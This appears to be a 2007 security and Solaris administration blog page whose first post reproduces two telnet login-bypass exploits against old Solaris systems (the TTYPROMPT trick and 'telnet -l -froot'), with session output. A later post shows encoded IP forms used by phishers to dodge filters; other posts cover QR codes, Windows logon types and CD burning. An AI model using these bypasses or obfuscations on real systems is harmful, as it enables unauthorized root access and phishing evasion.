http://www.milw0rm.com/exploits/57
Example:
coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami bin
OR
http://weblog.infoworld.com/securityadviser/archives/2007/02/huge_easy_solar.html
telnet -l "-froot" [hostname]
Every once in a while I run across a box running telnet internally and feel compelled to at least try these two. If you are running telnet, which is bad enough, for god sake at least patch. (and put tcp wrappers, and iptables, etc...)
Tuesday, March 27, 2007
Monday, March 19, 2007
QR Codes
http://qrcode.kaywa.com/
Interesting site that allows you to create QR codes, which are very similar to barcode, except they are in a square and can hold around 4000 characters of text.
You can also download a QRCode scanner from the site that can be loaded on your cell phone, that uses the cell phone camera as a scanner.
Friday, March 16, 2007
Windows Logon Types
http://www.windowsecurity.com/articles/Logon-Types.html
Logon Type 2 – Interactive
Logon Type 3 – Network
Logon Type 4 – Batch
Logon Type 5 – Service
Logon Type 7 – Unlock
Logon Type 8 – NetworkCleartext
Logon Type 9 – NewCredentials
Logon Type 10 – RemoteInteractive
Logon Type 11 – CachedInteractive
Logon Type 2 – Interactive
Logon Type 3 – Network
Logon Type 4 – Batch
Logon Type 5 – Service
Logon Type 7 – Unlock
Logon Type 8 – NetworkCleartext
Logon Type 9 – NewCredentials
Logon Type 10 – RemoteInteractive
Logon Type 11 – CachedInteractive
Wednesday, March 14, 2007
Blastwave: Solaris Software made Simple
http://www.blastwave.org/howto.html
This walks you through installing on of the best Solaris Software management systems ever.
Update packages easily.
Install packages effortlessly.
Obviously this is not meant for your production servers, but it works great on my desktop system.
This walks you through installing on of the best Solaris Software management systems ever.
Update packages easily.
Install packages effortlessly.
Obviously this is not meant for your production servers, but it works great on my desktop system.
Tuesday, March 13, 2007
CD-RW on Solaris
http://docsun.cites.uiuc.edu/sun_docs/C/solaris_9/SUNWaadm/SYSADV1/p65.html#MEDACCESS-5
How to burn a CD in Solaris. Sadly this is the first time in 10 years that I've actually had a CD/DVD-RW on a Sparc system (Ultra45). So this is the first time I've had a chance to mess with it.
Summary:
How to burn a CD in Solaris. Sadly this is the first time in 10 years that I've actually had a CD/DVD-RW on a Sparc system (Ultra45). So this is the first time I've had a chance to mess with it.
Summary:
$ cdrw -l
Looking for CD devices...
Node Connected Device Device type
----------------------+--------------------------------+-----------------
cdrom1 | YAMAHA CRW8424S 1.0d | CD Reader/Writer
$ mkisofs -r /pathname > cd-file-system
-r | Creates Rock Ridge information and resets file ownerships to zero. |
/pathname | Identifies the pathname used to create the ISO 9660 file system. |
> cd-file-system | Identifies the name of the file system to be put on the CD. |
Copy the CD file system onto the CD.
$ cdrw -i cd-file-system |
-i cd-file-system | Specifies the image file for creating a data CD. |
Monday, March 12, 2007
Firekeeper - FireFox IDS
http://firekeeper.mozdev.org
First official alpha release of Firekeeper - Intrusion Detection and Prevention System for Firefox is available for download. Firekeeper adds additional layer of protection to the browser. It uses flexible rules similar to Snort ones to describe browser based attack attempts. All incoming HTTP and HTTPS traffic is scanned with these rules. HTTPS and compressed responses are scanned after decryption/decompression. Suspicious response can trigger an alert that is displayed to the user or can be automatically cancelled, depending on an action specified in the rule. Firekeeper uses very effective pattern matching engine from Snort and with well written rules doesn't have a negative impact on the browser performance
First official alpha release of Firekeeper - Intrusion Detection and Prevention System for Firefox is available for download. Firekeeper adds additional layer of protection to the browser. It uses flexible rules similar to Snort ones to describe browser based attack attempts. All incoming HTTP and HTTPS traffic is scanned with these rules. HTTPS and compressed responses are scanned after decryption/decompression. Suspicious response can trigger an alert that is displayed to the user or can be automatically cancelled, depending on an action specified in the rule. Firekeeper uses very effective pattern matching engine from Snort and with well written rules doesn't have a negative impact on the browser performance
Friday, March 02, 2007
Addictive Zombie Game
Normally, I get tired of Zombie Games Post haste...this one is pretty cool:
http://www.newgrounds.com/portal/view/363126
http://www.newgrounds.com/portal/view/363126
Thursday, March 01, 2007
IP Obfuscation
The phishing blog PhishTank had the following article which was rather interesting:
http://www.phishtank.com/blog/2007/02/09/the-case-of-the-mysterious-hostname/
Basically, it reminds us that URLs (www.hostname.top) and IPs (123.123.123.123) are only formatted this way for human consumption...the computer can take the information in many forms. Take the following links:
www.phishtank.com
http://66.135.40.79/
http://1116153935/
http://0X42.0207.10319/
http://0102.8857679/
By taking the IP address out of base 10 numbers in octal organization...it makes it harder for humans and human made filters to pick-out.
http://www.phishtank.com/blog/2007/02/09/the-case-of-the-mysterious-hostname/
Basically, it reminds us that URLs (www.hostname.top) and IPs (123.123.123.123) are only formatted this way for human consumption...the computer can take the information in many forms. Take the following links:
www.phishtank.com
http://66.135.40.79/
http://1116153935/
http://0X42.0207.10319/
http://0102.8857679/
By taking the IP address out of base 10 numbers in octal organization...it makes it harder for humans and human made filters to pick-out.
Subscribe to:
Posts (Atom)
